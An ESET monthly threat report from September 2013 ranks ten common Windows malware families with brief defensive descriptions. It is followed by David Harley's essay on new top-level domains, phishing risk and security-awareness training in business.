Monthly Threat Report: September 2013


1. Win32/Bundpil

Previous Ranking: 2
Percentage Detected: 3.69%

Win32/Bundpil.A is a worm that spreads via removable media. The worm contains an URL address, and it tries to download several files from the address. The files are then executed and the HTTP protocol is used.  The worm may delete the following folders:

. INF/Autorun

Previous Ranking: 5
Percentage Detected: 2.08%

This detection label is used to describe a variety of malware using the file autorun.inf as a way of compromising a PC. This file contains information on programs meant to run automatically when removable media (often USB flash drives and similar devices) are accessed by a Windows PC user. ESET security software heuristically identifies malware that installs or modifies autorun.inf files as INF/Autorun unless it is identified as a member of a specific malware family.

Removable devices are useful and very popular: of course, malware authors are well aware of this, as INF/Autorun’s frequent return to the number one spot clearly indicates. Here’s why it’s a problem.

The default Autorun setting in Windows will automatically run a program listed in the autorun.inf file when you access many kinds of removable media. There are many types of malware that copy themselves to removable storage devices: while this isn’t always the program’s primary distribution mechanism, malware authors are always ready to build in a little extra “value” by including an additional infection technique.

While using this mechanism can make it easy to spot for a scanner that uses this heuristic, it’s better to disable the Autorun function by default, rather than to rely on antivirus to detect it in every case.

3. Win32/Sality

Previous Ranking: 4
Percentage Detected: 2.05%

Sality is a polymorphic file infector. When run starts a service and create/delete registry keys related with security activities in the system and to ensure the start of malicious process each reboot of operating system.
It modifies EXE and SCR files and disables services and process related to security solutions.
More information relating to a specific signature:

4. HTML/Iframe

Previous Ranking: 1
Percentage Detected: 1.78%

Type of infiltration: Virus
HTML/Iframe.B is generic detection of malicious IFRAME tags embedded in HTML pages, which redirect the browser to a specific URL location with malicious software.

5. HTML/ScrInject

Previous Ranking: 3
Percentage Detected: 1.73%

Generic detection of HTML web pages containing script obfuscated or iframe tags that that automatically redirect to the malware download.

6. Win32/Dorkbot

Previous Ranking: 7
Percentage Detected: 1.59%

Win32/Dorkbot.A is a worm that spreads via removable media. The worm contains a backdoor. It can be controlled remotely. The file is run-time compressed using UPX.
The worm collects login user names and passwords when the user browses certain web sites. Then, it attempts to send gathered information to a remote machine.  This kind of worm can be controlled remotely.

7. Win32/Conficker

Previous Ranking: 6
Percentage Detected: 1.58%

The Win32/Conficker threat is a network worm originally propagated by exploiting a recent vulnerability in the Windows operating system. This vulnerability is present in the RPC sub-system and can be remotely exploited by an attacker without valid user credentials. Depending on the variant, it may also spread via unsecured shared folders and by removable media, making use of the Autorun facility enabled at present by default in Windows (though not in Windows 7).

Win32/Conficker loads a DLL through the svchost process. This threat contacts web servers with pre-computed domain names to download additional malicious components. Fuller descriptions of Conficker variants are available at

While ESET has effective detection for Conficker, it’s important for end users to ensure that their systems are updated with the Microsoft patch, which has been available since the third quarter of 2008, so as to avoid other threats using the same vulnerability. Information on the vulnerability itself is available at While later variants dropped the code for infecting via Autorun, it can’t hurt to disable it: this will reduce the impact of the many threats we detect as INF/Autorun. The Research team in San Diego has blogged extensively on Conficker issues:

It’s important to note that it’s possible to avoid most Conficker infection risks generically, by practicing “safe hex”: keep up-to-date with system patches, disable Autorun, and don’t use unsecured shared folders.

8. Win32/Ramnit

Previous Ranking: 8
Percentage Detected: 1.43%

It is a file infector. It’s a virus that executes on every system start.It infects dll and exe files and also searches htm and html files to write malicious instruction in them. It exploits vulnerability on the system (CVE-2010-2568) that allows it to execute arbitrary code. It can be controlled remotley to capture screenshots, send gathered information, download files from a remote computer and/or the Internet, run executable files or shut down/restart the computer.

9. Win32/Qhost

Previous Ranking: 9
Percentage Detected: 1.23 %

This threat copies itself to the %system32% folder of Windows before starting. It then communicates over DNS with its command and control server. Win32/Qhost can spread through e-mail and gives control of an infected computer to an attacker.

10. Win32/Virut

Previous Ranking: 10
Percentage Detected: 0.98%

Win32/Virut is a polymorphic file infector. It affects files with EXE and SCR extensions, by adding the threat itself to the last section of the files source code. Aditionally, it searches for htm, php and asp files adding to them a malicious iframe. The virus connects to the IRC network. It can be controlled remotely.


TLDs, Phishing, Business Security and Education

David Harley CITP FBCS CISSP ESET Senior Research Fellow

Recently we were asked about the security implications of the new wave of professional Top Level Domains (TLDs), notably .bank. This isn’t an issue I’ve really given much thought to: I only work seven days a week. But it seems to me that the central issue with gTLDs (generic TLDs) like .bank as opposed to specific brand TLDs like .barclays is how much trust you can place in the bona fides of a domain.

Some thought has been put into reducing the risk of trademark infringement and avoiding cybersquatting in terms of brand TLDs, and that has in indirect benefit to the user because it makes phishing somewhat less likely. However, once the domain is approved and launched, how safe it is depends on the good intent and security-awareness of the domain holder.

Very heavy use has been made in recent years of subdomains under TLDs such as and .tk to host malicious URLs, as well as TLDs whose core business is to provide subdomains (or sub-subdomains) under their own *.com domain. There’s potential here for an expansion of such malicious activity, and I for one am not going to rush to click on any links in any email I receive from {mybank}.bank, let alone such gifts to typosquatting as .comm.

There’s recently been a revitalized discussion on Twitter about the much-heralded death of anti-virus. I’ve been hearing this since about 1994, so it must be going to happen soon. Well, Larry Bridwell and I will be discussing the demise of the industry that pays my bills at the AVAR conference in December, so I won’t devote a lot of space to that issue now, but one of the interesting facets of that Twitter threat came out of a blog by Blaze in which he suggests that there is a blame attribution model where various stakeholders – AV vendors, other security vendors, Microsoft, and other application vendors – attribute some blame to one or more of the other players, but all blame the end user.

I agree, that’s kind of close to a ‘blame the victim’ culture like the one that old-school virus writers and new age cybercriminals are both apt to subscribe to. Kurt Wismer points out though that “at the end of the day, no one is expecting the attackers to collectively vanish, so improving things is going to require changes on the part of other players as well, including the users.” Improving user awareness across the board – particularly for home users – is a bigger job than I can do justice to in a short article, but how about in the business world? As it happens, that’s something else we were asked about recently…

Every kind of business generates and store data that is potentially of interest to cyber criminals, and even the smallest business should assess how valuable or sensitive its data really is, by performing a formal security audit if appropriate. Businesses of any size are also subject to national data protection laws and need to be aware of these and of the penalties for non-compliance.

As part of their risk analysis, businesses (irrespective of their size) need to consider the impact of a security breach on the business, thinking about who or what would be affected and whether the business could continue to trade if a breach was successful. Once it has a clear view of the risks it can then decide how to communicate network security policies to its staff.

The first step is to make sure staff are aware of the risks from cyber-criminals. Although cybercrooks are sometimes very cunning and sophisticated, their impact can be drastically reduced by some simple preventative measures and education. Good user education is a filter, not a flood: you can’t educate effectively by hitting people with ‘everything they need to know about security’ in one massive hit: it’s an ongoing process that focuses on essentials, on teaching the user to extrapolate from one example scenario to others, and reinforcement of core messages over the whole period where the staff member works for the company.

It’s essential to create a culture of security awareness where all staff, regardless of level and role, take it for granted that they are part of the solution.

For cyber security efforts to be as successful as should be, everyone needs to know and understand what the organisation’s cyber security policies are, how to comply with them through proper use of controls, why compliance is important and the possible consequences of failure to comply (to the company and to the individual).

The goal should be the creation of a “security-aware workforce”: not a workforce comprised entirely of security gurus, but one where employees are empowered to report risky practices to management. Staff training sessions should make employees aware of such things as email safety, password usage, safe mobile use and the importance of data protection, and an Acceptable Use Policy (AUP) for all staff, including approved web and social media usage. Policies, controls and security education should also take into account data-sharing relationships with partners, vendors and clients. An authoritarian approach to security enforcement with draconian penalties won’t suit every environment, but employers should spell out that a breach of security can be very bad news for business and threaten its continued operation. If there are specific disciplinary consequences, they need to be clearly documented so that staff are in no doubt as to their existence.

Education is not a one-time, one-shot process. People forget what they don’t use, and have to be reminded and even re-trained. People are better at complying with policies when they understand the rationale behind them. Even assuming that they intend to comply, they’re likelier to remember to comply if they understand why they should do X and shouldn’t do Y.

Since education is an on-going process, HR can play an important role in ensuring that everyone receives suitable and consistent training in the form most appropriate to their role. IT and HR need to liaise to ensure that people have appropriate training and system privilege levels as they enter the organisation and change roles, and to ensure that they don’t retain inappropriate access once they leave.

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s